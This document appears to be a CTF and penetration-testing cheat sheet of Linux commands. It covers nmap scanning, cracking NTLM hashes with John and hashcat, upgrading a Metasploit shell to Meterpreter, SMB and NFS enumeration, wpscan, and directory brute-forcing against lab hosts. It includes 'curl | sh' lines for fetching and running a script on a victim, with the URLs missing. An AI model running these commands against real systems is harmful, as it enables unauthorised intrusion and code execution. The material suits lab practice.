Linux commands that are often used by hackers, security professional and CTF players. We will avoid any payloads or oneliner exploits ( will cover in different page sometime).

Add Target to hosts file

└─$ echo ' blue.thm' | sudo tee -a /etc/hosts
[sudo] password for abhinav: blue.thm


#for TCP Scan
sudo nmap -sC -sV -p- -T5 -Pn targethost

#for UDP Scan
sudo nmap -sU -sV -p- -T5 -Pn targethost

# Store scan results for ports separated by comma.
└─$ ports=$(nmap -p- --min-rate=1000 -T4 cronos.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

# Check which ports are found
└─$ echo $ports

# Pass the information in -p argument as $ports
└─$ sudo nmap -sC -sV -A -O -T5 -p$ports cronos.htb

Start Metasploit with database

Cracking hash with John

└─$ john hash --format=NT --wordlist=/usr/share/wordlists/rockyou.txt 

Cracking hash with hashcat

Windows NTLM Hash

hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt.gz

Metasploit Shell Upgrade to Meterpreter sessions -u 3 sessions -u -1 use post/multi/manage/shell_to_meterpreter run session=-1

Extract Files

Gz Files

gunzip archive.gz

tar –xvzf archive.tar.gz

SSH Connection

ssh username@host -oHostKeyAlgorithms=+ssh-dss

Text Filter

grep -i ]- inlcude grep -v ]- exclude

SMB Enumeration


nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse
smbclient //IP/directory

mount NFS

make directory locally and mount it

mkdir /mnt/sampleDIR
sudo mount IP:/folder /mnt/sampleDIR


get version via banner nc IP port


From github

curl -L | sh

Python Simple HTTP Server

python3 -m http.server 7777
curl | sh #Victim

Wordpress CMS Vulnerabilty Scanning

wpscan --url https://brainfuck.htb --disable-tls-checks

Directory Enumeration

└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://cronos.htb/FUZZ -mc 200,403 -c -t 400

└─$ gobuster dir -u  http://cronos.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --threads 200 --quiet